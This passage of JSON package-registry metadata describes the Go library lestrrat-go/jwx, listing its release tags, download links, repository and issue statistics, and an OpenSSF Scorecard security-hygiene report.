ab8d436e0a9","kind":"commit","published_at":"2021-03-02T22:19:12.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.5-rc1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.5-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.5-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.5-rc1/manifests"},{"name":"v1.1.4","sha":"db48a5c54e2bf7d069a170de798d6bc914dae96d","kind":"commit","published_at":"2021-03-01T21:47:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.4/manifests"},{"name":"v1.1.3","sha":"a7162536a2a50e66cc69bab0e4deb403e3f1fdc0","kind":"commit","published_at":"2021-02-22T08:42:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.3/manifests"},{"name":"v1.1.2","sha":"a7f076fc6eadb44380d41b5e30eb5a85a91de864","kind":"commit","published_at":"2021-02-16T10:05:46.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.2/manifests"},{"name":"v1.1.1","sha":"451a45cc212f752fa0011e64d8042ec87f0762df","kind":"commit","published_at":"2021-02-05T02:01:14.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"7f69ac971a6fd1cff28abadfe1e654f33004a19a","kind":"commit","published_at":"2021-01-31T07:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.1.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.1.0/manifests"},{"name":"v1.0.8","sha":"3bb9a18ceb5f45ffc4d0b837f85a5c3eb3f0bbfe","kind":"commit","published_at":"2021-01-14T23:41:30.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.8","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.8/manifests"},{"name":"v1.0.7","sha":"36d0cd5770ba08f66232bc143fd26856c258f27b","kind":"commit","published_at":"2021-01-11T10:52:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.7","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.7/manifests"},{"name":"v1.0.6","sha":"d4cb6651f457177451df330a37eaa0af4c7476a0","kind":"commit","published_at":"2020-12-16T21:36:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.6","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.6/manifests"},{"name":"v1.0.5","sha":"5aeabd78da3bab07a0ae04d299575f967590380e","kind":"commit","published_at":"2020-09-28T08:03:15.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.5","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"3d8cae88e8782b73d109e2cf66603b76826dd079","kind":"commit","published_at":"2020-08-14T13:41:34.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.4","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"3294517bae6989c5e89b00d0f72d79667d098942","kind":"commit","published_at":"2020-07-08T07:05:25.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.3","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.3/manifests"},{"name":"v1.0.2","sha":"d173045330f3e507d1d34b7fa622763dd744ecd6","kind":"commit","published_at":"2020-05-07T12:10:10.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"9969e2cb3255455a4a6b8a6da164bf80877155ef","kind":"commit","published_at":"2020-05-04T05:46:28.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5e17c3a031d6fb0962f929adcc3effc6dbb9f102","kind":"commit","published_at":"2020-05-03T03:30:16.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v1.0.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v1.0.0/manifests"},{"name":"v0.9.2","sha":"1402056cec6d7faba7454657f7bf180b2b1f14d5","kind":"commit","published_at":"2020-04-13T03:20:24.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.2","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"041c40732a8843e7d4a0b7cd2cffbe2f339f92ca","kind":"commit","published_at":"2020-02-26T22:25:54.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.1","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"5d60d87d07ddea9874404944870bec81aabcf574","kind":"commit","published_at":"2019-05-20T02:55:45.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v0.9.0","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v0.9.0/manifests"}]},"repo_metadata_updated_at":"2026-03-25T17:02:57.907Z","dependent_packages_count":0,"downloads":null,"downloads_period":null,"dependent_repos_count":0,"rankings":{"downloads":null,"dependent_repos_count":9.345852080216646,"dependent_packages_count":6.999148183520997,"stargazers_count":1.0929961382075044,"forks_count":1.4345083313038627,"average":4.718126183312252},"purl":"pkg:golang/github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/go/github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/go/github.com/lestrrat-go/jwx/jwt/internal/cmd/gentoken/dependencies","status":null,"funding_links":["https://github.com/sponsors/lestrrat"],"critical":null,"issue_metadata":{"last_synced_at":"2026-03-23T10:02:05.442Z","issues_count":94,"pull_requests_count":747,"avg_time_to_close_issue":3354245.694117647,"avg_time_to_close_pull_request":304118.8680351906,"issues_closed_count":85,"pull_requests_closed_count":682,"pull_request_authors_count":27,"issue_authors_count":64,"avg_comments_per_issue":3.978723404255319,"avg_comments_per_pull_request":0.5903614457831325,"merged_pull_requests_count":577,"bot_issues_count":1,"bot_pull_requests_count":372,"past_year_issues_count":13,"past_year_pull_requests_count":196,"past_year_avg_time_to_close_issue":210964.44444444444,"past_year_avg_time_to_close_pull_request":191349.9512195122,"past_year_issues_closed_count":9,"past_year_pull_requests_closed_count":164,"past_year_pull_request_authors_count":10,"past_year_issue_authors_count":11,"past_year_avg_comments_per_issue":2.923076923076923,"past_year_avg_comments_per_pull_request":0.2857142857142857,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":80,"past_year_merged_pull_requests_count":143,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/issues","maintainers":[{"login":"lestrrat","count":345,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}],"active_maintainers":[{"login":"lestrrat","count":104,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/lestrrat"}]},"versions_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwt%2Finternal%2Fcmd%2Fgentoken/versions","version_numbers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwt%2Finternal%2Fcmd%2Fgentoken/version_numbers","latest_version_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwt%2Finternal%2Fcmd%2Fgentoken/latest_version","dependent_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwt%2Finternal%2Fcmd%2Fgentoken/dependent_packages","related_packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwt%2Finternal%2Fcmd%2Fgentoken/related_packages","codemeta_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages/github.com%2Flestrrat-go%2Fjwx%2Fjwt%2Finternal%2Fcmd%2Fgentoken/codemeta","maintainers":[],"registry":{"name":"proxy.golang.org","url":"https://proxy.golang.org","ecosystem":"go","default":true,"packages_count":2168948,"maintainers_count":0,"namespaces_count":792747,"keywords_count":113213,"github":"golang","metadata":{"funded_packages_count":53976},"icon_url":"https://github.com/golang.png","created_at":"2022-04-04T15:19:22.939Z","updated_at":"2026-06-10T05:03:23.672Z","packages_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/packages","maintainers_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/maintainers","namespaces_url":"https://packages.ecosyste.ms/api/v1/registries/proxy.golang.org/namespaces"}},{"id":11400755,"name":"github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf","ecosystem":"go","description":"","homepage":"https://github.com/lestrrat-go/jwx","licenses":"MIT","normalized_licenses":["MIT"],"repository_url":"https://github.com/lestrrat-go/jwx","keywords_array":[],"namespace":"github.com/lestrrat-go/jwx/v2/jwe/internal","versions_count":0,"first_release_published_at":null,"latest_release_published_at":"2025-12-16T18:24:14.674Z","latest_release_number":null,"last_synced_at":"2026-05-10T03:02:21.172Z","created_at":"2025-03-03T22:47:21.300Z","updated_at":"2026-05-10T03:02:21.173Z","registry_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf","install_command":"go get github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf","documentation_url":"https://pkg.go.dev/github.com/lestrrat-go/jwx/v2/jwe/internal/concatkdf#section-documentation","metadata":{},"repo_metadata":{"id":37406150,"uuid":"45516769","full_name":"lestrrat-go/jwx","owner":"lestrrat-go","description":"Complete implementation of JWx (Javascript Object Signing and Encryption/JOSE) technologies for Go. #golang #jwt #jws #jwk #jwe","archived":false,"fork":false,"pushed_at":"2026-03-23T20:34:17.000Z","size":21587,"stargazers_count":2339,"open_issues_count":5,"forks_count":192,"subscribers_count":24,"default_branch":"develop/v3","last_synced_at":"2026-03-24T15:23:41.313Z","etag":null,"topics":["go","golang","jwe","jwk","jws","jwt","oidc"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"mit","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/lestrrat-go.png","metadata":{"files":{"readme":"README.md","changelog":"Changes","contributing":".github/CONTRIBUTING.md","funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":"SECURITY.md","support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null,"zenodo":null,"notice":null,"maintainers":null,"copyright":null,"agents":"AGENTS.md","dco":null,"cla":null},"funding":{"github":["lestrrat"],"patreon":null,"open_collective":null,"ko_fi":null,"tidelift":null,"community_bridge":null,"liberapay":null,"issuehunt":null,"otechie":null,"custom":null}},"created_at":"2015-11-04T05:12:52.000Z","updated_at":"2026-03-23T20:34:22.000Z","dependencies_parsed_at":"2023-09-23T13:31:33.054Z","dependency_job_id":"8122a1a4-053c-4ee5-9b97-9972c16335ef","html_url":"https://github.com/lestrrat-go/jwx","commit_stats":{"total_commits":1692,"total_committers":66,"mean_commits":"25.636363636363637","dds":0.3427895981087471,"last_synced_commit":"f0730766974533dcd9e5f8074a0adfcc471b0f0a"},"previous_names":["lestrrat/jwx"],"tags_count":106,"template":false,"template_full_name":null,"purl":"pkg:github/lestrrat-go/jwx","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/refs/heads/develop/v3","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/sbom","scorecard":{"id":371885,"data":{"date":"2025-08-11","repo":{"name":"github.com/lestrrat-go/jwx","commit":"568c2c84f11f47f53126b44bf3a3d76993038cba"},"scorecard":{"version":"v5.2.1-40-gf6ed084d","commit":"f6ed084d17c9236477efd66e5b258b9d4cc7b389"},"score":6.6,"checks":[{"name":"Maintained","score":10,"reason":"30 commit(s) and 7 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#maintained"}},{"name":"Code-Review","score":0,"reason":"Found 0/23 approved changesets -- score normalized to 0","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#code-review"}},{"name":"Security-Policy","score":10,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Info: Found disclosure, vulnerability, and/or timelines in security policy: SECURITY.md:1","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#security-policy"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#dangerous-workflow"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#packaging"}},{"name":"Binary-Artifacts","score":10,"reason":"no binaries found in the repo","details":null,"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#binary-artifacts"}},{"name":"CII-Best-Practices","score":0,"reason":"no effort to earn an OpenSSF best practices badge detected","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#cii-best-practices"}},{"name":"Token-Permissions","score":0,"reason":"detected GitHub workflow tokens with excessive permissions","details":["Info: jobLevel 'actions' permission set to 'read': .github/workflows/codeql.yml:28","Info: jobLevel 'contents' permission set to 'read': .github/workflows/codeql.yml:29","Warn: no topLevel permission defined: .github/workflows/assign-issue.yml:1","Warn: no topLevel permission defined: .github/workflows/assign-pr.yml:1","Warn: no topLevel permission defined: .github/workflows/autodoc.yml:1","Warn: no topLevel permission defined: .github/workflows/benchmark.yml:1","Warn: no topLevel permission defined: .github/workflows/ci.yml:1","Warn: no topLevel permission defined: .github/workflows/codeql.yml:1","Warn: no topLevel permission defined: .github/workflows/dependabot.yml:1","Warn: no topLevel permission defined: .github/workflows/lint.yml:1","Warn: no topLevel permission defined: .github/workflows/smoke.yml:1","Warn: no topLevel permission defined: .github/workflows/stale.yml:1","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#token-permissions"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#license"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#fuzzing"}},{"name":"Pinned-Dependencies","score":6,"reason":"dependency not pinned by hash detected -- score normalized to 6","details":["Warn: third-party GitHubAction not pinned by hash: .github/workflows/ci.yml:45: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/ci.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:47: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:61: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/codeql.yml:74: update your workflow using https://app.stepsecurity.io/secureworkflow/lestrrat-go/jwx/codeql.yml/develop/v3?enable=pin","Warn: goCommand not pinned by hash: .github/workflows/benchmark.yml:33","Warn: goCommand not pinned by hash: .github/workflows/ci.yml:36","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:42","Warn: goCommand not pinned by hash: .github/workflows/smoke.yml:44","Info:  15 out of  18 GitHub-owned GitHubAction dependencies pinned","Info:   4 out of   5 third-party GitHubAction dependencies pinned","Info:   2 out of   6 goCommand dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#pinned-dependencies"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#branch-protection"}},{"name":"SAST","score":9,"reason":"SAST tool detected but not run on all commits","details":["Info: SAST configuration detected: CodeQL","Warn: 24 commits out of 27 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/f6ed084d17c9236477efd66e5b258b9d4cc7b389/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-18T13:10:24.800Z","repository_id":37406150,"created_at":"2025-08-18T13:10:24.800Z","updated_at":"2025-08-18T13:10:24.800Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":30897961,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-03-24T08:58:18.477Z","status":"ssl_error","status_checked_at":"2026-03-24T08:57:59.595Z","response_time":106,"last_error":"SSL_read: unexpected eof while reading","robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":false,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"lestrrat-go","name":"lestrrat-go","uuid":"36653903","kind":"organization","description":"@lestrrat 's Go projects","email":null,"website":null,"location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/36653903?v=4","repositories_count":99,"last_synced_at":"2023-08-07T14:22:53.617Z","metadata":{"has_sponsors_listing":false},"html_url":"https://github.com/lestrrat-go","funding_links":[],"total_stars":null,"followers":null,"following":null,"created_at":"2022-11-06T19:45:03.488Z","updated_at":"2023-08-07T14:22:54.666Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/lestrrat-go/repositories"},"tags":[{"name":"v3.0.13","sha":"163a6e94d45a8f89c7d0e25f30652a95c554bd88","kind":"commit","published_at":"2026-01-12T06:38:32.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.13","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.13/manifests"},{"name":"v3.0.12","sha":"987379965645db94a50483d7c21c9358b905469a","kind":"commit","published_at":"2025-10-20T09:17:05.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.12","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/lestrrat-go%2Fjwx/tags/v3.0.12/manifests"},{"name":"v3.0.11","sha":"9e9c27a269a1a650e1f666b18946dd1796f84779","kind":"commit","published_at":"2025-09-14T02:50:03.000Z","download_url":"https://codeload.github.com/lestrrat-go/jwx/tar.gz/v3.0.11","html_url":"https://github.com/lestrrat-go/jwx/releases/tag/v3.0.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/lestrrat-go/jwx@v3.0.11","tag_url":"https://repos.